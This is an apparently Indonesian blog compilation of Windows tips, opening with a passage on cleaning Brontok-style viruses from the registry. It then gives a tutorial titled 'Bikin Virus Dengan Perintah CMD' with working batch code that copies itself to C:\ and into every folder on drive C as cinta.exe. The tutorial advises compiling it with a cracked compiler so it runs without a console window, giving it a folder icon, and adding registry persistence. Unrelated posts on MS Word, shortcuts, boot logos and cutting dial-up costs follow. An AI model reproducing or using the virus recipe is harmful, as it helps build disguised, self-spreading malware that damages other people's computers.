HKCU\Software\Microsoft\Windows\CurrentVersion\Policies,DisableRegedit=1, langsung klik [Fix checked], ini buat balikin fungsi regedit.

Trus Cari yang sekiranya mencurigakan, contoh bron-spizaetus, empty.pif, bronstab.exe. kalo kangen ccapps, kalo romantic devil sysria dll.

3. Sekarang masuk ke regedit (kita belum ngaktifin run, jadi lewat manual ke windows\regedit), trus cari yang aneh-aneh misal kalo brontok cari
values : bron-spizaetus, tok-cirrhatus, dll. Trus langsung hapus bleh

4. Nah buat balikin fungsi yang di matiin (Run, Search, Folder Options) cari di
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, trus langsung delete aja, atau ubah stringnya jadi (0). Misalnya
NoRun Reg_dword 0x00000000 (1) di ubah jadi NoRun Reg_dword 0x00000000 (0). Arti dari 1 adalah true dan 0 adalah false itu kata dosen COA gw.

5. Kemudian search *.exe, cari yang ukuran filenya sama dan ikon berbentuk folder tanpa dosa (20 kb, 40 kb, 80kb tergantung variantnya). Trus hapus.

6. Sekarang tinggal nunggu virus baru dan siap basmi hohoho

Bikin Virus Dengan Perintah CMD

Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.

Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya â€œ copy %0 c:\ â€œ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah â€œfor %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe â€œ .

Perintah ini berarti â€œ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe â€œ. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya â€œ explorer %userprofile% â€œ.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti â€œuntuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exeâ€. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnyaâ€¦.dan seterusnya pikirkan sendiri perintahnyaâ€¦..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy â€œ%%aâ€ c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy â€œ%%aâ€ c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.

Keterangan:
Pada contoh perintah diatas â€œfor %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe â€œ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi â€œ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe â€œ

12 Desember 2008

TubeTilla YouTube Downloader 3.0

Download videos from YouTube and convert them to several formats like MP3, MP4 and WMV.
Features:

FREE YouTube Downloader
FREE YouTube Music Downloader.
FREE YouTube Converter
Convert YouTube videos to MP4, MP3 and WMV.
Fast downloading for even modem users.
Save YouTube videos to your PC as a backup.

Download Di :
www.freewarecorner.com/tubetilla-youtube-downloader-30.html

World Theme for your Symbian s60 3th edition

Free Strange World Theme for your Symbian s60 3th edition.

Download: to free Download

Sponsors:

Related Softwares:

Tips MS Word

Menampilkan screen tips

Screen tips merupakan tulisan yang muncul saat pointer mouse diletakkan di atas icon pada toolbar. Dengan menampilkan screen tips tersebut Anda dapat melihat shortcut untuk icon tertentu sehingga nantinya Anda dapat bekerja lebih efisien dengan bantuan shortcut tersebut.
Langkah-langkahnya sebagai berikut :
1. Klik menu Tools - Customize.
2. Pindah ke tab Options.
3. Beri tanda check pada Show screen tips on toolar.
4. Klik OK.

Mengganti ukuran dalam centimeter
Secara default ukuran panjang dan lebar document pada MS Word adalah dalam Inches. Anda bisa menggantinya dengan ukuran centimeter atau yang lainnya sesuai keinginan Anda. Caranya sbb :
1. Klik menu Tools - Options.
2. Pindah ke tab General.
3. Pada measurement units Anda tingal pilih sesuai yang Anda sukai (centimeter, inches, points, picas).
4. Klik OK.

Meningkatkan performa komputer Anda

Klik kanan My Computer, pilih Properties. Pada tab Performance pilih Virtual Memory. Pilih Let me specify my own virtual memory setting. Pada bagian Minimum dan Maximum, isi dengan 2 atau 3 kali RAM Anda. Jadi jika Anda punya RAM 32 Mb, isi dengan 64 Mb.

Mengganti logo startup

Pada saat start, maka Windows akan memanggil file logo.sys yang terletak di directory utama (C:\). File logo.sys merupakan hidden file, jadi untuk melihatnya buka Windows Explorer, klik View - Folder Option. Pidah ke tab View, beri tanda check pada Show All Files. Klik OK. Lalu dengan Windows Explorer, klik kanan pada file logo.sys, pilih properties dan hilangkan semua tanda check.
Buat backup file/cadangan jika perlu.
Pindah ke DOS prompt. Pindah ke directory utama (c:\). Ketikkan "ren logo.sys logo.bmp" (tanpa tanda petik).
Buka file logo.bmp tersebut dengan editor image favorit Anda (Paint, PhotoShop, PhotoPaint, dll).
Edit gambar seperlunya dan simpan kembali sebagai file logo.bmp.
Kembali ke DOS prompt, ganti nama logo.bmp dengan logo.sys dengan mengetikkan ren logo.bmp logo.sys.
Restart Windows.

Apabila Anda ingin mengganti dengan gambar yang lain, maka hal-hal yang perlu diperhatikan adalah :

Gambar yang akan digunakan sebagai ganti mempunyai warna sebanyak 256.
Ukuran file kurang lebih 127 kb.
Besar/ukuran gambar 320 x 400 pixels
Ekstensi harus .sys.

Mengganti logo Shut Down

Pada saat shutdown, file yang dijalankan adalah logow.sys (please white while.....) dan logos.sys (it's now save to ......). Kedua hidden file tersebut terletak di directory windows (biasanya C:\Windows). Untuk mengganti kedua gambar tersebut caranya seperti di atas. Kalau Anda tidak mau repot-repot mengedit file, Anda bisa menggunakan software (salah satunya) Win Logo Changer untuk mengganti layar start up dan shut down

Menghapus file TEMP

Tambahkan baris berikut pada file autoexec.bat Anda :

if not exist %TEMP%\*.TMP goto EndTMP
atrrib %TEMP%\*.TMP -r -a -s -h
del %TEMP%\*.TMP
:EndTMP
Maka mulai sekarang tiap kali komputer Anda di-booting, secara otomatis akan menghapus file-file *.TMP.

Shortcut ke pengaturan system

Biasanya anda harus mengklik kanan desktop lalus Properties untuk mengatur tampilan desktop Windows 95. Sebenarnya ada cara yang lebih cepat yaitu dengan menggunakan shortcut. Caranya :
1. Klik kanan pada desktop, pilih New - Shortcut.
2. Pada command line, ketikkan C:\WINDOWS\CONTROL.EXE Sysdm.cpl, System,1
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Shortcut untuk Shutdown

Untuk mempercepat shutdown Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New - Shortcut.
2. Pada command line ketikkan c:\windows\rundll32.exe user, exitwindows.
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Shortcut untuk Restart

Untuk mempercepat restart Anda bisa membuat shortcut pada desktop.
Cara 1 :
1. Klik kanan area kosong pada desktop, pilih New - Shortcut.
2. Pada command line ketikkan C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec.
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Cara 2 :
1. Jalankan Notepad.
2. Ketikkan @exit.
3. Simpan dengan nama restart.bat di C:\
4. Jalankan windows explorer, klik kanan dan seret file tersebut ke desktop.
5. Pada menu yang muncul pilih Create Shortcut(s) Here.
6. Klik kanan shortcut tersebut, pilih Properties.
7. Pindah ke tab Programs, beri tanda check pada Close on Exit.
8. Klik tombol Advanced.
9. Tandai pilhan MS-DOS Mode, serta hapus pilihan Warn before entering MS-DOS mode.
10. Klik OK, dan OK lagi untuk menutup kotak dialog Properties.

Shortcut untuk Log Off

Untuk mempercepat log off Anda bisa membuat shortcut pada desktop. Caranya :
1. Klik kanan area kosong pada desktop lalu pilih New - Shortcut.
2. Pada command line ketikkan C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0
3. Klik next dan beri nama shortcut tersebut.
4. Terakhir klik Finish.

Download semua shortcut

Mengganti assosiasi file dengan cepat

Untuk mengganti assosiasi file (program yang digunakan untuk membuka file) Anda tidak perlu masuk ke registry. Cara yang mudah adalah pilih file yang ingin dirubah. Tekan tombol Shift dan klik kanan pada file tersebut sehingga muncul menu Open with. Klik pada menu tersebut dan pilih program yang akan digunakan untuk membuka tipe file tersebut. Beri tanda check pada "Always use this program to open this type of file". Terakhir klik OK.

Mengganti warna Blue Screen of Death

Anda yang sudah akrab dengan Windows pasti pernah mengalami hal ini : layar tiba-tiba berwarna biru, tulisan putih dan komputer hang. Nah, Anda bisa mengganti warna tersebut dengan warna kesukaan Anda. Caranya, klik Start - Run, tuliskan sysedit. Pilih system.ini. Lalu cari yang ada tulisan [386Enh], dan tuliskan di bawahnya :
MessageTextColor= 8
MessageBackColor= 4
Ganti angka 8 dan 4 dengan warna kesukaan Anda (Black=0 Blue=1 Green=2 Cyan=3 Red=4 Magenta=5 Brown=6 White=7 Gray=8 Bright Blue=9 Bright Green=A Bright Cyan=B Bright Red=C Pink=D Yellow=E Bright White=F)

Mengganti icon drive

Bosan dengan icon drive yang monoton ? Ganti aja ! Caranya :
1. Jalankan Notepad.
2. Ketik :
[AutoRun]
Icon=C:\Icon\iconsatu.ico
(asumsi : terdapat file iconsatu.ico pada directory Icon. Anda bisa mengganti dengan letak file icon Anda)
3.Simpan dengan nama autorun.inf dan letakkan pada root directory drive C.

Bila ingin mengganti icon drive lainnya, tinggal ganti huruf C dengan huruf drive yang akan diganti.

Mengurutkan menu

Kadang menu (shortcut) yang terletak pada Start - Programs tidak urut berdasarkan abjad sehingga acapkali membingunkan kita. Nah, untuk mengurutkan menu tersebut caranya sbb : klik Start - Programs, geser kursor ke kanan. Klik kanan dan pada menu yang muncul pilih Sort By Name.

Menghemat satu kali klik

Untuk membuka atau menjalankan file biasanya kita harus melakukan klik dua kali pada file tersebut. Ada cara yang lebih cepat, yaitu cukup dengan sekali klik saja suatu file atau program dapat kita jalankan. Caranya sebagai berikut:

Buka Windows Explorer.
Dari menu View, pilih Folder Options.
Klik Tombol Settings....
Pada bagian Click items as Follows, pilih Single-click to open an item (point to select).
Klik OK, Apply dan terakhir Close.

Menghemat pulsa akses Internet

Dalam berbagai kesempatan memberikan ceramah-ceramah di berbagai daerah, pertanyaan yang paling sering ditanyakan adalah "bagaimana caranya supaya akses Internet menjadi murah?" "koq pulsa telepon saya setelah menggunakan Internet menjadi Rp. 1 juta se bulan?" sekitar itu lah pertanyaan yang sering kali muncul.

Umumnya peserta ceramah-ceramah tersebut agak kaget setelah saya beritahukan bahwa pulsa telepon saya di rumah untuk Internet per bulan sekitar Rp. 200.000-an dan iuran ke ISP saya indo.net.id sekitar Rp. 40.000-an per bulan. Sebuah angka yang relatif kecil sekali di bandingkan dengan jumlah informasi yang saya terima setiap hari sekitar 600-700 e-mail.

Pada kesempatan ini akan saya coba jelaskan bagaimana strategi yang dapat kita gunakan supaya Internet menjadi murah. Strategi & trik-trik tersebut saya peroleh dari pengalaman sehari-hari di lapangan.

Yang pertama, saya lebih banyak menggunakan e-mail di Internet dibandingkan melakukan browsing & chatting. Praktis 98% waktu saya di Internet adalah menulis, mengirim & menerima e-mail - sangat sedikit sekali waktu yang saya berikan untuk melakukan browsing. Berbeda dengan browsing & surfing di Internet yang memposisikan kita sebagai konsumen informasi saja, dalam e-mail sering kali saya menjadi produsen informasi & langsung di sebarkan ke berbagai mailing list, secara filosofi menjadi produsen informasi akan jauh lebih menguntungkan & produktif daripada konsumen informasi. Menjelaskan sesuatu akan lebih baik daripada sekedar menerima penjelasan. E-mail juga merupakan media komunikasi interaktif dua arah sehingga secara filosofis juga lebih baik daripada web yang hanya satu arah saja.

Ada cukup banyak trik-trik yang bisa dilakukan dalam menggunakan e-mail tersebut, seperti saya lebih suka menggunakan e-mail account ISP bukan free Web based mail seperti yahoo.com, hotmail.com. Kalau di hitung benar-benar maka menggunakan e-mail account di ISP akan jauh lebih murah daripada yahoo & hotmail.

Tuliskan semua e-mail yang akan dikirim secara offline (modem tidak dimasukan ke telepon) dan di antrikan dalam antrian Outbox siap untuk dibuang ke Internet pada saat nanti modem di sambungkan. Hal ini tidak bisa dilakukan jika kita menggunakan free web mail seperti yahoo & hotmail. Jika menggunakan yahoo & hotmail telepon harus dinyalakan pada saat menulis e-mail jadi sangat merugikan. Apalagi kalau harus menulis / membaca ratusan mail setiap hari-nya.

Dengan menggunakan software e-mail seperti Eudora, Microsoft Outlook, Microsoft Outlook Express dengan sekali tekan tombol send-receive semua mail di Outbox akan dikirim ke Internet dan mail dari Internet di ambil masuk ke Inbox. Seluruh proses hanya akan membutuhkan waktu sekitar 3-5 menitan saja untuk transaksi sekitar 500-an mail dengan isi biasa-biasa saja (tidak ada attachment). Bayangkan kalau biaya yang kita bayar Rp. 150 / menit ke ISP & Telkom, maka hanya butuh sekitar Rp. 1000-2000 / hari untuk menerima & mengirim ratusan e-mail dari / ke Internet. Hal ini tidak mungkin dilakukan jika anda menggunakan Yahoo & Hotmail.

Jika anda sering memperoleh spamming / mail yang tidak di inginkan maka coba gunakan fasilitas filter yang di sediakan di mail software mail anda. Saya biasanya cukup sadiz dalam hal ini, sering kali kalau saya menerima junk mail tersebut, langsung e-mail address orang tersebut saya masukan ke daftar yang mail-nya harus saya delete di server. Kira-kira dalam fasilitas filter caranya eudora / outlook express diminta untuk melihat "From:" kalau cocok e-mail address-nya perintahkan untuk di delete di server saja mailnya jangan di download ke PC kita - dengan cara itu akan sangat membantu meringankan beban telepon kita.

Saya harus akui bahwa saya tidak ada waktu untuk melakukan IRC / chatting karena saya sangat mobile sekali memberikan ceramah-ceramah jadi tidak mungkin melakukan IRC. Akhirnya e-mail menjadi pilihan yang paling natural dengan kondisi bekerja yang demikian mobile.

Bagaimana dengan Web? Akses ke Web memang penting terutama jika kita membutuhkan informasi / pengetahuan yang spesifik akan suatu hal. Kondisi saya memang agak berbeda dengan kebanyakan orang karena saya menggunakan laptop dengan fasilitas modem & ethernet yang bisa disambungkan ke LAN / Telepon dimana saja.

Ada beberapa hal yang mungkin bisa dilakukan agar akses Web yang kita lakukan dapat dilakukan secara effisien dan hemat pulsa. Saya coba memberikan beberapa trik yang mungkin akan membantu bagi kebanyakan orang yang menggunakan PC biasa dengan fasilitas dial-up dari rumah. Satu hal yang akan sangat membantu adalah mengakses Web dipagi hari (tepatnya subuh) sekitar jam 4-6 pagi, karena di waktu itu adalah waktu dimana traffik ke / dari Internet ke Indonesia sedang dalam posisi terendah - artinya tidak banyak orang yang menggunakan Internet dari Indonesia oleh karena itu jika kita mengakses Web di jam itu maka akan sangat terasa sekali bedanya di bandingkan di jam kerja apalagi jam 12 siang atau jam 4 sore hari dimana di situ adalah titik-titik tertinggi traffik Internet di Indonesia. Berbeda dengan akses Web, hal ini tidak berlaku bagi akses e-mail yang secara prinsip anda bisa melakukannya kapan saja karena akses e-mail hanya ke server mail lokal di ISP.

Selanjutnya pada saat akses Web, kita harus tahu secara pasti informasi / pengetahuan apa yang ingin kita cari di Internet - jangan sampai kita mengakses Web tanpa tujuan ang jelas - karena hampir dapat dipastikan hasilnya akan mubazir & akhirnya yang dicari hanya gambar-gambar saja yang membuang uang percuma - menurut saya, tentunya mungkin tidak percuma bagi yang ingin melampiaskan napsunya

Gunakan search engine seperti www.yahoo.com atau www.infoseek.com untuk mencari informasi / pengetahuan yang kita perlukan dengan memasukan keyword yang sesuai dengan pengetahuan tersebut. Misalnya kita tertarik dengan bisnis di Internet, bisa digunakan keyword e-commerce, small business atau spesifik di bidang yang kita inginkan.

Jika anda menggunakan Internet explorer maka ada baiknya menggunakan fasilitas "favourite" yang menyimpan halaman Web yang dinginkan dan di set pada saat kita masukan ke "favourite" supaya halaman Web bisa dibaca nantinya secara offline tanpa menyalakan modem. Penggunaan Web favourite yang bisa dibaca offline akan sangat membantu supaya kita tidak perlu membaca secara detail pada saat kita online di Internet tapi di save saja semuanya supaya nanti pada saat semua halaman sudah di download dan modem sudah di putuskan maka kita bisa membaca secara detail pengetahuan yang kita peroleh sambil santai minum kopi tanpa perlu kuatir membayar pulsa telkom yang mahal itu.

Fasilitas lain yang juga sangat membantu adalah fasilitas synchronize juga ada di dalam fasilitas favourite yang akan mensinkronisasi halaman Web yang kita inginkan apakah itu untuk meng-update supaya lebih baru lagi, atau juga untuk mengambil 2-3 link di bawah-nya sekaligus tanpa perlu kita meng-klik satu per satu link tersebut dan memasukan ke dalam favourite untuk di baca offline.

Jika anda adalah pengakses Internet yang cukup serius sebaiknya mencoba berfikir untuk meminta saluran telepon koin ke Telkom untuk diletakan dirumah anda. Bukannya apa-apa telepon koin pulsa-nya sekitar 40% lebih murah dibandingkan dengan telepon biasa. Kekurangan dari telepon koin adalah, saluran ini tidak bisa digunakan untuk menerima telepon hanya bisa digunakan untuk menelepon saja - untuk penggunaan Internet saluran telepon koin akan sangat ideal sekali karena Internet memang tidak membutuhkan kemampuan untuk menerima telepon karena selalu akan menelepon ke ISP saja.

Kira-kira demikian sebagian dari trik-trik yang dapat digunakan untuk menghemat pulsa anda dalam mengakses Internet. Mudah-mudahan bisa membantu anda dalam mengakses Internet secara murah meriah.

Mengganti icon shortcut

Shortcut yang terletak pada Start - Programs sebenarnya tidak hanya mempunyai satu macam icon saja. Misalnya icon untuk MS Word. Mungkin Anda hanya mengenal icon bergambar W saja. Sebenarnya MS Word 97 mempunyai delapan macam icon lainnya yang dapat Anda gunakan sebagai alternatif. Untuk menggantinya caranya sebagai berikut :

Klik Start - Program, dan arahkan mouse ke Microsoft Word.
Klik kanan pada tulisan Microsoft Word, klik Properties.
Pindah ke tab Shortcut.
Tekan tombol Change Icon.
Pilih icon yang Anda inginkan dan klik OK.
Tekan Aplly dan terakhir Close.

Mengganti background pada Windows Explorer

Supaya tampilan Windows Explorer maupun folder Anda lebih menarik, Anda bisa menambahkan dengan gambar favorit Anda sebagai background. Ada pun caranya adalah sebagai berikut :

Buka Windows Explorer.
Klik menu View, dan pilih Customize this folder.
Dari tiga pilihan yang ada, pilih Create a background picture, klik Next.
Tekan tombol browse dan arahkan ke tempat Anda menyimpan gambar yang akan digunakan sebagai background.
Kalau sudah ketemu klik Open, dan Next.
Terakhir klik Finish.

Mengenal perintah-perintah dasar DOS

Mengenal ekstensi file

Saat Anda mengklik kanan pad file dan memilih Properties, pada bagian MS-DOS name pasti ada tulisan tiga huruf sesudah titik. Itulah yang dinamakan ekstensi file. Fungsinya adalah untuk mengetahui atau membedakan jenis file. Nah, yang kami tuliskan di sini adalah beberapa jenis file yang paling umum. Untuk mengetahui ekstensi file lainnya Anda bisa membuka Windows Explorer, lalu pilih menu View - Folder Options. Pindah ke tab Files Types. Di sana terdapat puluhan dan mungkin ratusan ekstensi file. Semakin banyak Anda menginstall aplikasi maka daftar ekstensi file yang ada akan semakin panjang. Di antara beberapa ekstensi file itu adalah sebagai

Mengatasi masalah pada booting Windows

Banyak masalah yang terjadi pada waktu booting. Untuk mengatasinya Anda perlu tahu apakah masalah itu terjadi sebelum komputer menampilkan Windows splash screen. Bila ya kemungkinan besar terjadi masalah pada hardware atau BIOS.

Bila windows tidak menampilkan desktop screen

Mungkin Anda pernah mengalami masalah seperti ini. Kompoter Anda sudah menampilkan splash screen tapi ditunggu sampai lama windows tidak juga menampilkan desktop screen. Untuk mengatasinya Anda perlu booting pada Safe Mode. Caranya, pada saat komputer selesai melakukan "proses" BIOS tekanlah tombol [Ctrl] sampai muncul berbagai menu pilihan. Setelah itu pilihlah Safe Mode. Jika Anda termasuk beruntung maka Anda bisa masuk windows sampai desktop screen. Klik kanan pada My Computer, pilih Properties. Pillih pada tab Device Manager. Bila Anda melihat tanda seru pada salah satu Device yang ada berarti terjadi "konfilk" device. Untuk itu Anda perlu men-disable hardware yang mengalami masalah. Setelah itu Anda bisa restart.

Menampilkan jam dalam format Indonesia

Lihatlah pada pojok kiri komputer Anda, pastilah terdapat tampilan jam yang menunjukkan waktu pada saat ini. Tampilan waktu tersebut tentunya sangat bermanfaat bagi Anda yang sangat menghargai waktu, apalagi bagi Anda yang tidak punya jam :-). Tapi seringkali tampilan tersebut tidak sesuai dengan kebiasaan kita (baca : orang Indonesia) yang menganut sistem 24 jam. Sehingga tampilan jam selalu menunjukkan antara angka 1 sampai 12 (hanya beda am dan pm).

Sebenarnya Anda bisa mengganti tampilan jam tersebut sehingga lebih sesuai dengan format di Indonesia, misalnya 13.00 untuk menunjukkan jam 1.00 siang, 23.00 untuk jam 11 malam. Caranya sebagai berikut :
1. Buka Control Panel.
2. Klik icon Regional Settings.
3. Pada tab Regional Settings, pilih negara Indonesia.
4. Klik Apply, terus OK.
5. Terakhir restart komputer.